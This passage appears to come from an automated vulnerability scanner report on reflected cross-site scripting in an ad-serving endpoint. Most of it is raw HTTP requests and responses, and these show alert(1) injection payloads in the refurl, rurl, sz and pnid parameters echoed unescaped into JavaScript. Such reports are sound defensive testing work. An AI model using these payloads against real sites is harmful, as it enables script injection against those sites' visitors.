GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=028f31'-alert(1)-'8c939112a09&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:01 GMT
Expires: Fri, 26 Nov 2010 20:47:01 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
ck.net/click%3Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=028f31'-alert(1)-'8c939112a09&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation
...[SNIP]...

1.24. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [refurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the refurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77fe9'-alert(1)-'f21f4be48e2 was submitted in the refurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom77fe9'-alert(1)-'f21f4be48e2&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:17 GMT
Expires: Fri, 26 Nov 2010 20:47:17 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
g%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom77fe9'-alert(1)-'f21f4be48e2&rurl=http%3a%2f%2fwww.overstock.com">
...[SNIP]...

1.25. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [refurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the refurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d42f2"-alert(1)-"5cae220f39b was submitted in the refurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecomd42f2"-alert(1)-"5cae220f39b&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:16 GMT
Expires: Fri, 26 Nov 2010 20:47:16 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
g%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecomd42f2"-alert(1)-"5cae220f39b&rurl=";
var dcadvurl = escape(advurl);
var dcminversion = 9;
var dccreativewidth = "728";
var dccreativeheight = "90";
var dcwmode = "opaque";
var dcbgcolor = "";
var dcallowscriptaccess = "never";

/
...[SNIP]...

1.26. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 598f2"-alert(1)-"3a0419b7fbb was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=598f2"-alert(1)-"3a0419b7fbb HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7189
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:19 GMT
Expires: Fri, 26 Nov 2010 20:47:19 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=598f2"-alert(1)-"3a0419b7fbb";
var dcadvurl = escape(advurl);
var dcminversion = 9;
var dccreativewidth = "728";
var dccreativeheight = "90";
var dcwmode = "opaque";
var dcbgcolor = "";
var dcallowscriptaccess = "never";

//Overs
...[SNIP]...

1.27. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c83'-alert(1)-'284d4227519 was submitted in the rurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=49c83'-alert(1)-'284d4227519 HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7189
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:20 GMT
Expires: Fri, 26 Nov 2010 20:47:20 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=49c83'-alert(1)-'284d4227519http://www.overstock.com">
...[SNIP]...

1.28. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bbda"-alert(1)-"a1a576feacd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|28bbda"-alert(1)-"a1a576feacd&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:46:59 GMT
Expires: Fri, 26 Nov 2010 20:46:59 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
